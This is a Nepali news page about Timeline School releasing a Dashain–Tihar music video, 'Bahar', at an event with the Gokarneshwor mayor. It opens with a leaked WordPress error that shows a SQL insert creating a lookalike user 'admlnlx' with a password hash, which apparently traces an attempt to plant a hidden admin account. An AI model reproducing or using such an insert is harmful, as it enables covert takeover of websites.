WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B9j.WksPrEspPKTHgQlZqgRuH7gCYS0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 08:53:52', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाडौं । गाउँले इन्टरटेनमेन्टको ब्यानरमा गोकर्णेश्वर–५, जोरपाटी स्थित टाइमलाइन स्कुलले निर्माण गरेको नेपाली मौलिक सँस्कृतिमा आधारित दशैं–तिहार बिशेष साङ्गीतिक एल्बम ‘बहार’ को म्युजिक भिडियो सार्वजनिक भएको छ ।
आईतवार आयोजित कार्यक्रममा गोकर्णेश्वर नगरपालिकाका मेयर सन्तोष चालिसे, बरिष्ठ सङ्गीतकार शान्तिराम राई, प्याब्सन काठमाडौंका अध्यक्ष हरिकृष्ण श्रेष्ठ, प्याब्सन गोकर्णेश्वरका अध्यक्ष मदन कुमार सुवेदी, गायक थानेश्वर गौतम लगायत सङ्गीत क्षेत्रका विशिष्ट व्यक्तिहरुको उपस्थितिमा उक्त गीतको भिडियो सार्वजनिक गरिएको हो ।
कार्यक्रमलाई सम्बोधन गर्दै प्रमुख अतिथि सन्तोष चालिसेले टाइमलाइन स्कुलले प्रशंसनीय काम गरेको बताए । मेयर चालिसेले –‘नेपाली सँस्कृतिको जगेर्ना गर्नुपर्छ भनेर नै नगरपालिकाले स्थानीय पाठ्यक्रम तयार गरेको बताए । सोही अवधारणलाई आत्मसाथ गर्दै टाइमलाइन स्कुलले नेपाली मौलिक सँस्कृतिको जगेर्ना गर्ने उद्देश्यले अत्यन्तै राम्रो सिर्जना गरेको बताए ।
उक्त गीतमा टाइमलाइन स्कुलका प्रिन्सिपल राम प्रसाद बडालको शब्द रचना र रत्न राईको सङ्गीत रहेको छ । सत्यकला राई, सरला राई, लक्ष्मण चौलागाई र रत्न राईको स्वर रहेको उक्ता गीतको म्युजिक भिडियोमा केशब कोइरालाको निर्देशन, गंगाराम राइ र देभराज गुरुङको छायाङकन र गंगाराम राइको सम्पादन रहेको छ ।
https://www.youtube.com/watch?v=AZZvAAO1UC8